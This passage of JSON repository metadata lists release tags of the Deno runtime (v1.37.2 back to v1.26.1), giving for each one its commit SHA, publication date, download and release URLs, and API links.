.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","ki